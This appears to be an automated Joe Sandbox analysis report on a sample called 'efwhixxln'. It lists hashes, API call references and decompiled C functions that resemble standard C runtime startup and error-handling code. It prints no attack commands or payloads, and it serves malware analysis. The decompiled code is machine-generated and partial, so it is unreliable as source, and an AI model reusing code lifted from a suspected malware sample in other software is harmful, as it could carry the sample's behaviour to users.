                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: 73ab95eaebed31112dedeb384939a99c41ea5e8962cc08f2dd2c4e48d81c1728
                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction Fuzzy Hash: 39C09B7244410C77CF111947DC02E553F1997C0774F444031FB1C1D171B577D561D589
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 516 404140-404148 RtlEncodePointer
                                      APIs
                                      • RtlEncodePointer.NTDLL(00000000,004067F2,0040D000,00000314,00000000,?,?,?,?,?,004023BD,0040D000,Microsoft Visual C++ Runtime Library,00012010), ref: 00404142
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: EncodePointer
                                      • String ID:
                                      • API String ID: 2118026453-0
                                      • Opcode ID: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction ID: 320fb652cea0c6775c1c8cbb56ecac6aa1c380c61b5076c787df298dad675eb3
                                      • Opcode Fuzzy Hash: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00230E5C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                      • Instruction ID: 4db146a22d293dffc166a508f9adbc84cb16b890d6921d0e264d919b213c4883
                                      • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                      • Instruction Fuzzy Hash: 2D1136B0E14218EFDB00EFA8CC99BAEBBB4AB04704F204895E940B7291D2715A508BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00404F4C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                      				intOrPtr _v0;
                                      				void* _v804;
                                      				intOrPtr _v808;
                                      				intOrPtr _v812;
                                      				intOrPtr _t6;
                                      				intOrPtr _t11;
                                      				intOrPtr _t12;
                                      				intOrPtr _t13;
                                      				long _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t22;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr _t27;
                                      				intOrPtr* _t31;
                                      				void* _t34;
                                      
                                      				_t27 = __esi;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t22 = __ecx;
                                      				_t21 = __ebx;
                                      				_t6 = __eax;
                                      				_t34 = _t22 -  *0x40c560; // 0xae024b6d
                                      				if(_t34 == 0) {
                                      					asm("repe ret");
                                      				}
                                      				 *0x40db08 = _t6;
                                      				 *0x40db04 = _t22;
                                      				 *0x40db00 = _t25;
                                      				 *0x40dafc = _t21;
                                      				 *0x40daf8 = _t27;
                                      				 *0x40daf4 = _t26;
                                      				 *0x40db20 = ss;
                                      				 *0x40db14 = cs;
                                      				 *0x40daf0 = ds;
                                      				 *0x40daec = es;
                                      				 *0x40dae8 = fs;
                                      				 *0x40dae4 = gs;
                                      				asm("pushfd");
                                      				_pop( *0x40db18);
                                      				 *0x40db0c =  *_t31;
                                      				 *0x40db10 = _v0;
                                      				 *0x40db1c =  &_a4;
                                      				 *0x40da58 = 0x10001;
                                      				_t11 =  *0x40db10; // 0x0
                                      				 *0x40da0c = _t11;
                                      				 *0x40da00 = 0xc0000409;
                                      				 *0x40da04 = 1;
                                      				_t12 =  *0x40c560; // 0xae024b6d
                                      				_v812 = _t12;
                                      				_t13 =  *0x40c564; // 0x51fdb492
                                      				_v808 = _t13;
                                      				 *0x40da50 = IsDebuggerPresent();
                                      				_push(1);
                                      				E00404F44(_t14);
                                      				SetUnhandledExceptionFilter(0);
                                      				_t17 = UnhandledExceptionFilter(0x40a360);
                                      				if( *0x40da50 == 0) {
                                      					_push(1);
                                      					E00404F44(_t17);
                                      				}
                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                      			}



















                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f52
                                      0x00404f54
                                      0x00404f54
                                      0x00407bf6
                                      0x00407bfb
                                      0x00407c01
                                      0x00407c07
                                      0x00407c0d
                                      0x00407c13
                                      0x00407c19
                                      0x00407c20
                                      0x00407c27
                                      0x00407c2e
                                      0x00407c35
                                      0x00407c3c
                                      0x00407c43
                                      0x00407c44
                                      0x00407c4d
                                      0x00407c55
                                      0x00407c5d
                                      0x00407c68
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7c
                                      0x00407c86
                                      0x00407c90
                                      0x00407c95
                                      0x00407c9b
                                      0x00407ca0
                                      0x00407cac
                                      0x00407cb1
                                      0x00407cb3
                                      0x00407cbb
                                      0x00407cc6
                                      0x00407cd3
                                      0x00407cd5
                                      0x00407cd7
                                      0x00407cdc
                                      0x00407cf0

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00407CA6
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00407CBB
                                      • UnhandledExceptionFilter.KERNEL32(0040A360), ref: 00407CC6
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00407CE2
                                      • TerminateProcess.KERNEL32(00000000), ref: 00407CE9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction ID: dbcf6b17a614ed6de0b1c9335e572033b93b759128c27e0357c0478f51a6bb28
                                      • Opcode Fuzzy Hash: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction Fuzzy Hash: 2221C0B9E08205DFD704EFA5EB48A443BB4BB48310F41817AE509B76A1E7B46989CF4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403C1E() {
                                      
                                      				SetUnhandledExceptionFilter(E00403BDC);
                                      				return 0;
                                      			}



                                      0x00403c23
                                      0x00403c2b

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00403C23
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: af6a06db8a6811d703ce548b00a6c86c9554f0fcea87e8ed6f0d241f7707ce77
                                      • Instruction ID: 808b66936e4987cdf7952619d734cde061f180ce8922ae360e719cff21aff8f5
                                      • Opcode Fuzzy Hash: af6a06db8a6811d703ce548b00a6c86c9554f0fcea87e8ed6f0d241f7707ce77
                                      • Instruction Fuzzy Hash: F39002703611014AD7042B705E0D6053DE45A5C6077510471A041F80E6EA75A5109919
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                      • Instruction ID: acf7f74089822b6f94aade79d7545bdb6bfceaa2a25a1c2d654adb3873f0154f
                                      • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                      • Instruction Fuzzy Hash: B611A076620119AFC720EF69C8D0DAAB7E9EF147A4B008015FC58CB214E334ED91C7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                      • Instruction ID: 3ad2d8396a0310092979d8f36f3c8edb01107a5bffa56ac273248249f14a4264
                                      • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                      • Instruction Fuzzy Hash: 99E06576264149AF8B04CBA8C891D25B3E8EB08720F140290F829C72A0E634FE009A60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                      • Instruction ID: a69375c47d1dbbb6acb626a6b153f78f779abe24d03dbacf762cb5b0bf713597
                                      • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                      • Instruction Fuzzy Hash: 36E04F722306159BCB619F59C890D96F7E8EB88BB0F494465ED8D97610C230FC21CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E00404439(void* __ebx) {
                                      				void* __edi;
                                      				void* __esi;
                                      				_Unknown_base(*)()* _t7;
                                      				long _t10;
                                      				void* _t11;
                                      				int _t12;
                                      				void* _t14;
                                      				void* _t15;
                                      				void* _t16;
                                      				void* _t18;
                                      				intOrPtr _t21;
                                      				long _t26;
                                      				void* _t30;
                                      				struct HINSTANCE__* _t35;
                                      				intOrPtr* _t36;
                                      				void* _t39;
                                      				intOrPtr* _t41;
                                      				void* _t42;
                                      
                                      				_t30 = __ebx;
                                      				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                      				if(_t35 != 0) {
                                      					 *0x40d844 = GetProcAddress(_t35, "FlsAlloc");
                                      					 *0x40d848 = GetProcAddress(_t35, "FlsGetValue");
                                      					 *0x40d84c = GetProcAddress(_t35, "FlsSetValue");
                                      					_t7 = GetProcAddress(_t35, "FlsFree");
                                      					__eflags =  *0x40d844;
                                      					_t39 = TlsSetValue;
                                      					 *0x40d850 = _t7;
                                      					if( *0x40d844 == 0) {
                                      						L6:
                                      						 *0x40d848 = TlsGetValue;
                                      						 *0x40d844 = E00404149;
                                      						 *0x40d84c = _t39;
                                      						 *0x40d850 = TlsFree;
                                      					} else {
                                      						__eflags =  *0x40d848;
                                      						if( *0x40d848 == 0) {
                                      							goto L6;
                                      						} else {
                                      							__eflags =  *0x40d84c;
                                      							if( *0x40d84c == 0) {
                                      								goto L6;
                                      							} else {
                                      								__eflags = _t7;
                                      								if(_t7 == 0) {
                                      									goto L6;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t10 = TlsAlloc();
                                      					 *0x40c574 = _t10;
                                      					__eflags = _t10 - 0xffffffff;
                                      					if(_t10 == 0xffffffff) {
                                      						L15:
                                      						_t11 = 0;
                                      						__eflags = 0;
                                      					} else {
                                      						_t12 = TlsSetValue(_t10,  *0x40d848);
                                      						__eflags = _t12;
                                      						if(_t12 == 0) {
                                      							goto L15;
                                      						} else {
                                      							E00401FC4();
                                      							_t41 = __imp__EncodePointer;
                                      							_t14 =  *_t41( *0x40d844);
                                      							 *0x40d844 = _t14;
                                      							_t15 =  *_t41( *0x40d848);
                                      							 *0x40d848 = _t15;
                                      							_t16 =  *_t41( *0x40d84c);
                                      							 *0x40d84c = _t16;
                                      							 *0x40d850 =  *_t41( *0x40d850);
                                      							_t18 = E00406124();
                                      							__eflags = _t18;
                                      							if(_t18 == 0) {
                                      								L14:
                                      								E00404186();
                                      								goto L15;
                                      							} else {
                                      								_t36 = __imp__DecodePointer;
                                      								_t21 =  *((intOrPtr*)( *_t36()))( *0x40d844, E0040430A);
                                      								 *0x40c570 = _t21;
                                      								__eflags = _t21 - 0xffffffff;
                                      								if(_t21 == 0xffffffff) {
                                      									goto L14;
                                      								} else {
                                      									_t42 = E004059E0(1, 0x214);
                                      									__eflags = _t42;
                                      									if(_t42 == 0) {
                                      										goto L14;
                                      									} else {
                                      										__eflags =  *((intOrPtr*)( *_t36()))( *0x40d84c,  *0x40c570, _t42);
                                      										if(__eflags == 0) {
                                      											goto L14;
                                      										} else {
                                      											_push(0);
                                      											_push(_t42);
                                      											E004041C3(_t30, _t36, _t42, __eflags);
                                      											_t26 = GetCurrentThreadId();
                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                      											 *_t42 = _t26;
                                      											_t11 = 1;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					return _t11;
                                      				} else {
                                      					E00404186();
                                      					return 0;
                                      				}
                                      			}





















                                      0x00404439
                                      0x00404447
                                      0x0040444b
                                      0x0040446b
                                      0x00404478
                                      0x00404485
                                      0x0040448a
                                      0x0040448c
                                      0x00404493
                                      0x00404499
                                      0x0040449e
                                      0x004044b6
                                      0x004044bb
                                      0x004044c5
                                      0x004044cf
                                      0x004044d5
                                      0x004044a0
                                      0x004044a0
                                      0x004044a7
                                      0x00000000
                                      0x004044a9
                                      0x004044a9
                                      0x004044b0
                                      0x00000000
                                      0x004044b2
                                      0x004044b2
                                      0x004044b4
                                      0x00000000
                                      0x00000000
                                      0x004044b4
                                      0x004044b0
                                      0x004044a7
                                      0x004044da
                                      0x004044e0
                                      0x004044e5
                                      0x004044e8
                                      0x004045af
                                      0x004045af
                                      0x004045af
                                      0x004044ee
                                      0x004044f5
                                      0x004044f7
                                      0x004044f9
                                      0x00000000
                                      0x004044ff
                                      0x004044ff
                                      0x0040450a
                                      0x00404510
                                      0x00404518
                                      0x0040451d
                                      0x00404525
                                      0x0040452a
                                      0x00404532
                                      0x00404539
                                      0x0040453e
                                      0x00404543
                                      0x00404545
                                      0x004045aa
                                      0x004045aa
                                      0x00000000
                                      0x00404547
                                      0x00404547
                                      0x0040455a
                                      0x0040455c
                                      0x00404561
                                      0x00404564
                                      0x00000000
                                      0x00404566
                                      0x00404572
                                      0x00404576
                                      0x00404578
                                      0x00000000
                                      0x0040457a
                                      0x0040458b
                                      0x0040458d
                                      0x00000000
                                      0x0040458f
                                      0x0040458f
                                      0x00404591
                                      0x00404592
                                      0x00404599
                                      0x0040459f
                                      0x004045a3
                                      0x004045a7
                                      0x004045a7
                                      0x0040458d
                                      0x00404578
                                      0x00404564
                                      0x00404545
                                      0x004044f9
                                      0x004045b3
                                      0x0040444d
                                      0x0040444d
                                      0x00404455
                                      0x00404455

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401B9D), ref: 00404441
                                      • __mtterm.LIBCMT ref: 0040444D
                                        • Part of subcall function 00404186: DecodePointer.KERNEL32(00000004,004045AF,?,00401B9D), ref: 00404197
                                        • Part of subcall function 00404186: TlsFree.KERNEL32(00000019,004045AF,?,00401B9D), ref: 004041B1
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000000,00000000,77A5B15F,?,004045AF,?,00401B9D), ref: 0040618B
                                        • Part of subcall function 00404186: _free.LIBCMT ref: 0040618E
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000019,77A5B15F,?,004045AF,?,00401B9D), ref: 004061B5
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00401B9D), ref: 00404463
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00401B9D), ref: 00404470
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00401B9D), ref: 0040447D
                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,00401B9D), ref: 0040448A
                                      • TlsAlloc.KERNEL32(?,00401B9D), ref: 004044DA
                                      • TlsSetValue.KERNEL32(00000000,?,00401B9D), ref: 004044F5
                                      • __init_pointers.LIBCMT ref: 004044FF
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404510
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040451D
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040452A
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404537
                                      • DecodePointer.KERNEL32(0040430A,?,00401B9D), ref: 00404558
                                      • __calloc_crt.LIBCMT ref: 0040456D
                                      • DecodePointer.KERNEL32(00000000,?,00401B9D), ref: 00404587
                                      • GetCurrentThreadId.KERNEL32(?,00401B9D), ref: 00404599
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction ID: c3e9338d85a01cfe0ed26c54675152b6764567e349a99c4c3ac65f6cdb1ce54c
                                      • Opcode Fuzzy Hash: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction Fuzzy Hash: F2313FB2D01211AAC720BFB5EE096163BE5EBC4360B14863BE524B22F1D7789845CF9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E004041C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t26;
                                      				intOrPtr _t30;
                                      				intOrPtr _t39;
                                      				void* _t40;
                                      
                                      				_t31 = __ebx;
                                      				_push(8);
                                      				_push(0x40adc0);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				GetModuleHandleW(L"KERNEL32.DLL");
                                      				_t39 =  *((intOrPtr*)(_t40 + 8));
                                      				 *((intOrPtr*)(_t39 + 0x5c)) = 0x409dd0;
                                      				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                      				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                      				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                      				 *((char*)(_t39 + 0xc8)) = 0x43;
                                      				 *((char*)(_t39 + 0x14b)) = 0x43;
                                      				 *(_t39 + 0x68) = 0x40c578;
                                      				E0040629E(__ebx, 1, 0xd);
                                      				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                      				InterlockedIncrement( *(_t39 + 0x68));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				E00404265();
                                      				E0040629E(_t31, 1, 0xc);
                                      				 *(_t40 - 4) = 1;
                                      				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                      				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                      				if(_t26 == 0) {
                                      					_t30 =  *0x40cce0; // 0x40cc08
                                      					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                      				}
                                      				E0040563F( *((intOrPtr*)(_t39 + 0x6c)));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				return E00402F05(E0040426E());
                                      			}







                                      0x004041c3
                                      0x004041c3
                                      0x004041c5
                                      0x004041ca
                                      0x004041d4
                                      0x004041da
                                      0x004041dd
                                      0x004041e4
                                      0x004041eb
                                      0x004041ee
                                      0x004041f1
                                      0x004041f8
                                      0x004041ff
                                      0x00404208
                                      0x0040420e
                                      0x00404215
                                      0x0040421b
                                      0x00404222
                                      0x00404229
                                      0x0040422f
                                      0x00404232
                                      0x00404235
                                      0x0040423a
                                      0x0040423c
                                      0x00404241
                                      0x00404241
                                      0x00404247
                                      0x0040424d
                                      0x0040425e

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040ADC0,00000008,004042CB,00000000,00000000,?,00401038,?,00409378), ref: 004041D4
                                      • __lock.LIBCMT ref: 00404208
                                        • Part of subcall function 0040629E: __mtinitlocknum.LIBCMT ref: 004062B4
                                        • Part of subcall function 0040629E: __amsg_exit.LIBCMT ref: 004062C0
                                        • Part of subcall function 0040629E: EnterCriticalSection.KERNEL32(?,?,?,0040420D,0000000D), ref: 004062C8
                                      • InterlockedIncrement.KERNEL32(0040C578), ref: 00404215
                                      • __lock.LIBCMT ref: 00404229
                                      • ___addlocaleref.LIBCMT ref: 00404247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction ID: d428de3b8589a0431686e7cb1a02ea656415c747b6556e04c479c792043df686
                                      • Opcode Fuzzy Hash: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction Fuzzy Hash: FC018E71440B00EED720AF66D909709FBE0AF80324F10896FE496732E1CBB8AA40CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			E0040517E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t15;
                                      				LONG* _t21;
                                      				void* _t31;
                                      				LONG* _t33;
                                      				void* _t34;
                                      				void* _t35;
                                      
                                      				_t35 = __eflags;
                                      				_t29 = __edx;
                                      				_t25 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae30);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t31 = E004042F0(__ebx, __edx, _t35);
                                      				_t15 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                      					E0040629E(_t25, _t31, 0xd);
                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                      					_t33 =  *(_t31 + 0x68);
                                      					 *(_t34 - 0x1c) = _t33;
                                      					__eflags = _t33 -  *0x40c9a0; // 0x221a00
                                      					if(__eflags != 0) {
                                      						__eflags = _t33;
                                      						if(__eflags != 0) {
                                      							__eflags = InterlockedDecrement(_t33);
                                      							if(__eflags == 0) {
                                      								__eflags = _t33 - 0x40c578;
                                      								if(__eflags != 0) {
                                      									E004012B0(_t33);
                                      								}
                                      							}
                                      						}
                                      						_t21 =  *0x40c9a0; // 0x221a00
                                      						 *(_t31 + 0x68) = _t21;
                                      						_t33 =  *0x40c9a0; // 0x221a00
                                      						 *(_t34 - 0x1c) = _t33;
                                      						InterlockedIncrement(_t33);
                                      					}
                                      					 *(_t34 - 4) = 0xfffffffe;
                                      					E00405219();
                                      				} else {
                                      					_t33 =  *(_t31 + 0x68);
                                      				}
                                      				_t38 = _t33;
                                      				if(_t33 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t29, _t38);
                                      				}
                                      				return E00402F05(_t33);
                                      			}









                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x00405180
                                      0x00405185
                                      0x0040518f
                                      0x00405191
                                      0x00405199
                                      0x004051ba
                                      0x004051c0
                                      0x004051c4
                                      0x004051c7
                                      0x004051ca
                                      0x004051d0
                                      0x004051d2
                                      0x004051d4
                                      0x004051dd
                                      0x004051df
                                      0x004051e1
                                      0x004051e7
                                      0x004051ea
                                      0x004051ef
                                      0x004051e7
                                      0x004051df
                                      0x004051f0
                                      0x004051f5
                                      0x004051f8
                                      0x004051fe
                                      0x00405202
                                      0x00405202
                                      0x00405208
                                      0x0040520f
                                      0x004051a1
                                      0x004051a1
                                      0x004051a1
                                      0x004051a4
                                      0x004051a6
                                      0x004051a8
                                      0x004051aa
                                      0x004051af
                                      0x004051b7

                                      APIs
                                      • __getptd.LIBCMT ref: 0040518A
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __amsg_exit.LIBCMT ref: 004051AA
                                      • __lock.LIBCMT ref: 004051BA
                                      • InterlockedDecrement.KERNEL32(?), ref: 004051D7
                                      • _free.LIBCMT ref: 004051EA
                                      • InterlockedIncrement.KERNEL32(00221A00), ref: 00405202
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
